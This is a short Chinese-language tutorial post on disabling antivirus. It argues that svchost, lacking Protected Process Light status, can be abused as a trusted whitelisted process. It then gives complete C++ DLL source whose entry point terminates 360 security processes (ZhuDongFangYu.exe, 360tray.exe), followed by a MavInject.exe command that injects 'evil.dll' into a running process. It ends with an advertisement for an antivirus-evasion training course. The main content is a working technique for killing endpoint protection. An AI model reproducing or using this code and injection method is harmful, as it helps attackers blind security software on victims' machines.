参考这个https://bbs.kanxue.com/thread-281120.htm逆向分析以及我们的内存搜索,我们可以发现许多白名单进程,特别是一些系统常驻进程。白名单进程因为受到防病毒软件的信任,往往不会被严格监控,因此可以作为攻击者的突破口。
在这些常驻进程中,svchost(Service Host Process)是一个较为典型的例子。
svchost 是Windows系统中的核心进程,用于托管和运行各种服务,具有极高的系统权限。然而,svchost 并非PPL(Protected Process Light)进程,所以我们可以很轻松的对它冻手
// dllmain.cpp : 定义 DLL 应用程序的入口点。#include "pch.h"#include <tlhelp32.h>// 查找并终止指定的进程bool TerminateProcessByName(const wchar_t* processName) {// 获取系统进程快照HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);if (hSnapshot == INVALID_HANDLE_VALUE) {return false;}PROCESSENTRY32 processEntry;processEntry.dwSize = sizeof(PROCESSENTRY32);// 遍历进程列表if (Process32First(hSnapshot, &processEntry)) {do {// 如果找到匹配的进程名if (wcscmp(processEntry.szExeFile, processName) == 0) {HANDLE hProcess = OpenProcess(PROCESS_TERMINATE, FALSE, processEntry.th32ProcessID);if (hProcess != NULL) {// 终止进程TerminateProcess(hProcess, 0);CloseHandle(hProcess);}}} while (Process32Next(hSnapshot, &processEntry));}CloseHandle(hSnapshot);return true;}void kill() {TerminateProcessByName(L"ZhuDongFangYu.exe");TerminateProcessByName(L"360tray.exe");}BOOL APIENTRY DllMain( HMODULE hModule,DWORD ul_reason_for_call,LPVOID lpReserved){switch (ul_reason_for_call){case DLL_PROCESS_ATTACH:kill();case DLL_THREAD_ATTACH:case DLL_THREAD_DETACH:case DLL_PROCESS_DETACH:break;}return TRUE;}
编译以上DLL后选择你喜欢的任意一种注入方式,这里为了方便演示,我们使用LOLBin进行注入
MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll
哔哩哔哩有免杀基础课程,搜索账号:老鑫安全培训,老鑫安全二进制